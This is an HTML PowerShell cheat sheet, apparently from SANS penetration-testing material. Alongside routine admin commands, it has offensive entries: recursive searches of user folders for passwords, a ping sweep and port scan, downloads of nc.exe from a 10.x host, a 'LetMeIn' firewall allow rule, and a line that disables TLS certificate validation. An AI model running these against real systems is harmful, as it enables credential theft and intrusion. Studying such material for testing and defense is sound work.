<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Powershell SANS cheat</title>
</head><body><br/>
<span style="font-size: 13pt">Get a directory listing (ls, dir, gci):</span><br/>
PS C:\&gt; Get-ChildItem<br/>
<span style="font-size: 14pt"><br/>
</span><span style="font-size: 14pt">Copy a file (cp, copy, cpi):</span><br/>
PS C:\&gt; Copy-Item src.txt dst.txt<br/>
<span style="font-size: 14pt"><br/>
</span><span style="font-size: 14pt">Move a file (mv, move, mi):</span><br/>
PS C:\&gt; Move-Item src.txt dst.txt<br/>
<br/>
Find text within a file:<br/>
PS C:\&gt; Select-String –path c:\users<br/>
\*.txt –pattern password<br/>
<br/>
PS C:\&gt; ls -r c:\users -file | %<br/>
{Select-String -path $_ -pattern<br/>
password}<br/>
<br/>
Display file contents (cat, type, gc):<br/>
PS C:\&gt; Get-Content file.txt<br/>
<br/>
Get present directory (pwd, gl):<br/>
PS C:\&gt; Get-Location<br/>
<br/>
Get a process listing (ps, gps):<br/>
PS C:\&gt; Get-Process<br/>
<br/>
Get a service listing:<br/>
PS C:\&gt; Get-Service<br/>
<br/>
Formatting output of a command (Format-List):<br/>
PS C:\&gt; ls | Format-List –property<br/>
name<br/>
<br/>
Paginating output:<br/>
PS C:\&gt; ls –r | Out-Host -paging<br/>
<br/>
Get the SHA1 hash of a file:<br/>
PS C:\&gt; Get-FileHash -Algorithm SHA1<br/>
file.txt<br/>
<br/>
Exporting output to CSV:<br/>
PS C:\&gt; Get-Process | Export-Csv<br/>
procs.csv <br/>
<br/>
<br/>
Conduct a ping sweep:<br/>
PS C:\&gt; 1..255 | % {echo "10.10.10.$_";<br/>
ping -n 1 -w 100 10.10.10.$_ | SelectString<br/>
ttl}<br/>
<br/>
Conduct a port scan:<br/>
PS C:\&gt; 1..1024 | % {echo ((new-object<br/>
Net.Sockets.TcpClient).Connect("10.10.10<br/>
.10",$_)) "Port $_ is open!"} 2&gt;$null<br/>
Fetch a file via HTTP (wget in PowerShell):<br/>
<br/>
PS C:\&gt; (New-Object<br/>
System.Net.WebClient).DownloadFile("http<br/>
://10.10.10.10/nc.exe","nc.exe")<br/>
Find all files with a particular name:<br/>
<br/>
PS C:\&gt; Get-ChildItem "C:\Users\" -<br/>
recurse -include *passwords*.txt<br/>
<br/>
Get a listing of all installed Microsoft Hotfixes:<br/>
PS C:\&gt; Get-HotFix<br/>
<br/>
Navigate the Windows registry:<br/>
PS C:\&gt; cd HKLM:\<br/>
PS HKLM:\&gt; ls<br/>
List programs set to start automatically in the registry:<br/>
<br/>
PS C:\&gt; Get-ItemProperty HKLM:\SOFTWARE<br/>
\Microsoft\Windows\CurrentVersion\run<br/>
Convert string from ascii to Base64:<br/>
<br/>
PS C:\&gt;<br/>
[System.Convert]::ToBase64String([System<br/>
.Text.Encoding]::UTF8.GetBytes("PS<br/>
FTW!"))<br/>
<br/>
List and modify the Windows firewall rules:<br/>
PS C:\&gt; Get-NetFirewallRule –all<br/>
PS C:\&gt; New-NetFirewallRule -Action<br/>
Allow -DisplayName LetMeIn -<br/>
RemoteAddress 10.10.10.25 <br/>
<br/>
<b>Win 7 PS WebClient:</b><br/>
<br/>
(New-Object System.Net.WebClient).DownloadFile("http://10.0.0.10/nc.exe","nc.exe")<br/>
<br/>
<b>Win 8 and later PS Invoke-WebRequest (wget):</b><br/>
<br/>
wget "http://10.0.0.10/nc.exe" -outfile "nc.exe"<br/>
<br/>
<b>Display PowerShell Version:</b><br/>
<br/>
Get-Host<br/>
<br/>
$PSVersionTable.PSVersion<br/>
<br/>
ServicePointManager $true:<br/>
<br/>
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}<br/>
<br/>
<b>Disable-NetSSLValidation<br/>
</b><br/>
Invoke-SelfSignedWebRequest (External Project):<br/>
<br/>
Invoke-SelfSignedWebRequest https://www.my.af.mil/ "-outfile index.htm"<br/>
<br/>
wget-ss https://spectruminfosec.com/index.php<br/>
<br/>
<br/>
</body></html>